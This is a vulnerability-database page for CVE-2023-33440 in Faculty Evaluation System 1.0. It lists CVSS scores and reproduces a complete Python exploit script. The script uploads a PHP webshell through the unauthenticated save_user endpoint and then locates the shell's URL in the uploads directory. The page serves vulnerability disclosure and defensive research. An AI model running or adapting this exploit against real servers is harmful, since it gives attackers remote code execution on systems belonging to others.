Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAlex GanPACKETSTORM:172672
HistoryJun 01, 2023 - 12:00 a.m.

Faculty Evaluation System 1.0 Shell Upload

2023-06-0100:00:00
Alex Gan
packetstormsecurity.com
223

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

5.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

MULTIPLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:M/C:P/I:P/A:P

0.001 Low

EPSS

Percentile

20.8%

JSON
`# Exploit Title: Faculty Evaluation System 1.0 - Unauthenticated File Upload  
# Date: 5/29/2023  
# Author: Alex Gan  
# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip  
# Version: 1.0  
# Tested on: LAMP Fedora server 38 (Thirty Eight) Apache/2.4.57 10.5.19-MariaDB PHP 8.2.6  
# CVE: CVE-2023-33440  
# References: https://nvd.nist.gov/vuln/detail/CVE-2023-33440  
# https://www.exploit-db.com/exploits/49320  
# https://github.com/F14me7wq/bug_report/tree/main/vendors/oretnom23/faculty-evaluation-system  
#   
#!/usr/bin/env python3  
import os  
import sys  
import requests  
import argparse  
from bs4 import BeautifulSoup  
from urllib.parse import urlparse  
from requests.exceptions import ConnectionError, Timeout  
  
def get_args():  
parser = argparse.ArgumentParser()  
parser.add_argument('-u', '--url', type=str, help='URL')  
parser.add_argument('-p', '--payload', type=str, help='PHP webshell')  
return parser.parse_args()  
  
def get_user_input(args):  
if not (args.url):  
args.url = input('Use the -u argument or Enter URL:')  
if not (args.payload):  
args.payload = input('Use the -p argument or Enter file path PHP webshell: ')  
return args.url, args.payload  
  
def check_input_url(url):  
parsed_url = urlparse(url)  
if not parsed_url.scheme:  
url = 'http://' + url  
if parsed_url.path.endswith('/'):  
url = url.rstrip('/')  
return url  
  
def check_host_availability(url):  
try:  
response = requests.head(url=url + '/login.php')  
if response.status_code == 200:  
print("[+] Host is accessible")  
else:  
print("[-] Host is not accessible")  
print(" Status code:", response.status_code)  
sys.exit()  
except (ConnectionError, Timeout) as e:  
print("[-] Host is not accessible")  
sys.exit()  
except requests.exceptions.RequestException as e:  
print("[-] Error:", e)  
sys.exit()  
  
def make_request(url, method, files=None):  
if method == 'GET':  
response = requests.get(url)  
elif method == 'POST':  
response = requests.post(url, files=files)  
else:  
raise ValueError(f'Invalid HTTP method: {method}')  
  
if response.status_code == 200:  
print('[+] Request successful')  
return response.text  
else:  
print(f'[-] Error {response.status_code}: {response.text}')  
return None  
  
def find_file(response_get, filename, find_url):  
soup = BeautifulSoup(response_get, 'html.parser')  
  
links = soup.find_all('a')  
found_files = []  
  
for link in links:  
file_upl = link.get('href')  
if file_upl.endswith(filename):  
found_files.append(file_upl)  
  
if found_files:  
print(' File found:')  
for file in found_files:  
print('[*] ' + file)  
  
print(' Full URL of your file:')  
for file_url in found_files:  
print('[*] ' + find_url + file_url)  
else:  
print('[-] File not found')  
  
def main():  
args = get_args()  
url, payload = get_user_input(args)  
url = check_input_url(url)  
check_host_availability(url)  
  
post_url = url + "/ajax.php?action=save_user"  
get_url = url + "/assets/uploads/"  
filename = os.path.basename(payload)  
payload_file = [('img',(filename,open(args.payload,'rb'),'application/octet-stream'))]  
  
print(" Loading payload file")  
make_request(post_url, 'POST', files=payload_file)  
print(" Listing the uploads directory")  
response_get = make_request(get_url, 'GET')  
print(" Finding the downloaded payload file")  
find_file(response_get, filename, get_url)  
  
if __name__ == "__main__":  
main()  
  
`

Related

prion 1
zdt 1
cve 1
exploitdb 1
nuclei 1
prion
prion
Code injection
2023-05-26 16:15:00
zdt
zdt
Faculty Evaluation System 1.0 - Unauthenticated File Upload Exploit
2023-05-31 00:00:00
cve
cve
CVE-2023-33440
2023-05-26 16:15:10
exploitdb
exploitdb
Faculty Evaluation System 1.0 - Unauthenticated File Upload
2023-05-31 00:00:00
nuclei
nuclei
Faculty Evaluation System v1.0 - Remote Code Execution
2023-06-25 16:58:59

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

5.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

MULTIPLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:M/C:P/I:P/A:P

0.001 Low

EPSS

Percentile

20.8%

JSON
Related for PACKETSTORM:172672
prion1zdt1cve1exploitdb1nuclei1